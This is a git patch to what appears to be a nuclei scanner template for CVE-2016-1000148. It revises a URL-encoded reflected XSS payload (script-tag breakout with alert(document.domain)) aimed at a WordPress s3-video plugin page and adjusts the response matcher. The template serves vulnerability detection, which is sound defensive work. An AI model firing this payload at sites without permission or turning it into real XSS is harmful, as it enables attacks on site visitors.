From 0c7025f30d3040434a6cffeec80e13e4316efaa3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 12:55:51 +0530 Subject: [PATCH] Update CVE-2016-1000148.yaml --- cves/2016/CVE-2016-1000148.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml index cd8ee64bee..515c9bcf84 100644 --- a/cves/2016/CVE-2016-1000148.yaml +++ b/cves/2016/CVE-2016-1000148.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22" matchers-condition: and matchers: - type: word words: - - '"><"' + - '<"' part: body - type: word